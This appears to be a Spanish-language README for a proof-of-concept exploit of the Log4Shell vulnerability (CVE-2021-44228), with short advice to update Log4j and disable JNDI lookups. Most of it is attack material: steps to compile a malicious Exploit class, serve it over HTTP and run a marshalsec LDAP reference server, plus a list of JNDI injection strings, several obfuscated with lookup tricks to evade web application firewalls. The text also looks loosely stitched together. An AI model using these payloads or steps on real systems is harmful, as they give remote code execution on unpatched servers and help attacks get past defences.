
Exploit de prueba de concepto para CVE-2021-44228 (Log4Shell) con cargas útiles de inyección JNDI, técnicas de evasión de WAF e integración de escaneo pasivo para Burp Suite.
Las versiones 1.x tienen otras vulnerabilidades, recomendamos que actualice a la última versión.
Avisos / Boletines de seguridad relacionados con Log4Shell (CVE-2021-44228)
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
Finalmente, ejecute el proyecto y verá su calculadora desde local.
Consejos:
No confíe en una versión actual de Java para salvarse. Actualice Log4 (o elimine la búsqueda JNDI). Deshabilite la expansión (de todos modos parece una muy mala idea).
Por ejemplo:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
No confíe en el firewall de aplicaciones web.
Las búsquedas (lookups) proporcionan una forma de agregar valores a la configuración de Log4j en lugares arbitrarios.
Los métodos para causar una fuga en finally
LogManager.getLogger().error()
LogManager.getLogger().fatal()
Si desea realizar pruebas de caja negra, le sugiero que realice un escaneo pasivo.
¡Diviértete!!!
